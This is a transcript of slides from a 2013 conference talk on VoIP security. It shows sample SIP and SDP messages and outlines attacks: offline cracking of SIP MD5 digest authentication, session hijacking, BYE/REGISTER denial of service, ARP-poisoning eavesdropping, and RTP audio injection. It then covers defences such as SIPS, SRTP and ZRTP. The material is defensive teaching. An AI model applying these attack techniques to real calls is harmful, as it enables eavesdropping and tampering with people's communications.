securing voice communication
DESCRIPTION
A presentation given at AdhearsionConf 2013 about the possible attacks against SIP and RTP relative countermeasures.TRANSCRIPT
![Page 1: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/1.jpg)
SECURING VOICE COMMUNICATION
(The NSA does not need to hear about this.)
by Luca Pradovera
![Page 2: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/2.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
About meLuca Pradovera Voice Application Developer Mojo Lingo LLC, Atlanta, GA
![Page 3: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/3.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
CAN WE TRUST VOIP?NO.
![Page 4: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/4.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
Alice, Bob and Bubba
All cleartext!
![Page 5: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/5.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
Signaling: SIP(SESSION INITIATION PROTOCOL)
![Page 6: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/6.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
SIP is similar to HTTP
Request methods: INVITE, ACK, BYE
Headers: To, From
![Page 7: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/7.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
INVITE sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 10.203.175.1:63851;rport;branch=z9hG4bKPjOZmllyLuQ52Gda.vzcmWrVVtmFKSyRuz
Max-Forwards: 70
From: "Luca Pradovera" <sip:[email protected]>;tag=DRTwWU5q2EfrbebG7IMvd3RdDbsKFPOX
To: <sip:[email protected]>
Contact: <sip:[email protected]:63851>
Call-ID: PvpN2LErALSXW16MbkJPBcZNf7fzeSc4
CSeq: 15461 INVITE
Allow: SUBSCRIBE, NOTIFY, PRACK, INVITE, ACK, BYE, CANCEL, UPDATE, MESSAGE, REFER
Supported: 100rel, replaces, norefersub, gruu
User-Agent: Blink Pro 3.4.0 (MacOSX)
Authorization: Digest username="usera", realm="asterisk", nonce="080a602e", uri="sip:[email protected]", response="40732f23b39bc681484874c89c424bf4", algorithm=MD5
SIP Headers
![Page 8: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/8.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
Content-Type: application/sdp
Content-Length: 396
!v=0
o=- 3595073567 3595073567 IN IP4 10.203.175.1
s=Blink Pro 3.4.0 (MacOSX)
c=IN IP4 10.203.175.1
t=0 0
m=audio 50000 RTP/AVP 108 99 98 9 0 8 96
a=rtcp:50001
a=rtpmap:108 opus/48000
a=fmtp:108 useinbandfec=1
a=rtpmap:9 G722/8000
a=rtpmap:0 PCMU/8000
a=rtpmap:8 PCMA/8000
a=rtpmap:96 telephone-event/8000
a=fmtp:96 0-15
a=sendrecv
SDP Payload
![Page 9: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/9.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
Attacking SIP(TRY THIS AT SOMEONE ELSE’S HOME.)
![Page 10: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/10.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
SIP digest auth is weak.MD5-1 = MD5 (Username:Realm:Password)MD5-2 = MD5 (Method:URI)Response MD5 Value = MD5 (MD5-1:Nonce:MD5-2)
The only unknown term is the password
An offline attack is possible!=
![Page 11: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/11.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
SIP is vulnerableForging Contact: to hijack a session
Denial of servicevia BYE
Easy man-in the middle attacks
Denial of servicevia REGISTER
Identity theft
DoS via Expires: 0
![Page 12: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/12.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
How do we solve this?SIPS(SIP Secure)
Very similar to HTTPS - Requires client support
![Page 13: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/13.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
Software support• Asterisk: https://wiki.asterisk.org/wiki/display/AST/Secure
+Calling+Tutorial
• FreeSWITCH: http://wiki.freeswitch.org/wiki/SIP_TLS
• Many softphones and hardware phones
![Page 14: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/14.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
Media: RTP(REAL-TIME TRANSPORT PROTOCOL)
![Page 15: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/15.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
RTP BasicsUDP protocol
Ports 1024 to 65535
![Page 16: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/16.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
Let me hear you say…Packet sniffing enables easy eavesdropping
A switched network requires an ARP cache poisoning attack but not much more
CREEPY DEMO TIME!
![Page 17: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/17.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
What if I want to be REALLY bad?The timestamp usually starts with 0 and increments by the
length of the codec content (e.g. 160ms); the sequence starts with 0 and increments by 1, and the SSRC is usually a static
value for the session and a function of time.
=They are PREDICTABLE!
![Page 18: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/18.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
How can we have fun?
![Page 19: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/19.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
Audio injectionBy predicting timestamp, sequence and SSRC, we can
play whatever frame we want.
“Did you just say something?
![Page 20: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/20.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
Audio replacementUsing higher sequences and timestamp, we make the original audio packets obsolete.
Just replace “buy” with “sell” and watch Bitcoin crash!
![Page 21: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/21.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
What if I am just grumpy?
DoS via packet flooding (keep repeating a packet)
DoS by RTCP Bye (session teardown)
![Page 22: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/22.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
By the way, the NSA knows about this.
(AND IN CASE THEY WERE MISSING ANYTHING, IT IS IN MY DROPBOX ANYWAY)
![Page 23: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/23.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
SRTP(Secure RTP)
Uses symmetric keys and ciphers that need to be negotiated somehow
Uses AES in counter mode (AES-CTR) with 128 or 256 bit keys
Generates a cypher stream that is XORed real-time with plaintext media
Headers are signed, payload is encrypted
![Page 24: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/24.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
Still need those keys…(NEGOTIATION)
![Page 25: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/25.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
MIKEY and SDES
SDES (SDP Security Descriptions)a=crypto:1 AES_CM_128_HMAC_SHA1_80inline:d0RmdmcmVCspeEc3QGZiNWpVLFJhQX1cfHAwJSoj|2^20|1:32
requires full TLS protection and still exposes keying to SIP servers.
MIKEY was never actually adopted because it requires additional SIP capabilities
![Page 26: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/26.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
Keying in the media path: DTLS-SRTP
• DTLS exchange over the media port
• Uses secrets from the DTLS handshake as keying information
• Requires PKI (Public Key Infrastructure)
• Used by WebRTC
![Page 27: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/27.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
ZRTP(Z is cooler than S.)
![Page 28: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/28.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
What it does1. Discovery phase, to find out if the peers
support ZRTP
2. Key agreement phase, to exchange the keying data
3. Secure phase, confirming the cryptographic exchange worked and switching to SRTP
![Page 29: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/29.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
How it works• Exchange happens in
media path
• Diffie-Hellman key exchange
• SAS (Short Authentication String) produced so it can be compared by humans
![Page 30: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/30.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
Hellman, the mayonnaise guy?
![Page 31: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/31.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
Why is the SAS important?• The Short Authentication String is computed with a
hash of the keys negotiated during DH exchange
• It is usually a 4 digit number
• It guarantees the absence of a man-in-the-middle
• It is retained and reused for subsequent communications
![Page 32: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/32.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
Benefits• Does not require any signaling security
• It is, in fact, signaling and server agnostic (SIP, H.323, Jingle, WebRTC)
• Protected against man-in-the-middle attacks
• Best-effort encryption with feedback (the user agent knows if the line is secure or not)
• It has a Z in the acronym.
![Page 33: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/33.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
Software support
• FreeSWITCH: https://wiki.freeswitch.org/wiki/ZRTP
• Jitsi: https://jitsi.org/
• ZFone: http://zfoneproject.com/
![Page 34: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/34.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
Final caveats• You are never truly
secure
• Ensure you never drop out of the IP network
• Endpoints are easy targets
![Page 35: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/35.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
Bibliography• Hacking VoIP: Protocols, Attacks and
Countermeasures (http://goo.gl/33EtU7)
• SIP: Understanding the Session Initiation Protocol (http://goo.gl/sFSsSi)
• Applied Cryptography: Protocols, Algorithms, and Source Code in C (http://goo.gl/U4QOJj)
• Countless RFCs and extensions
![Page 36: Securing Voice Communication](https://reader035.vdocuments.net/reader035/viewer/2022062405/55763871d8b42a015c8b5169/html5/thumbnails/36.jpg)
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
Thank you!• http://
mojolingo.com
• @lucaprado on Twitter
• polysics on Github and IRC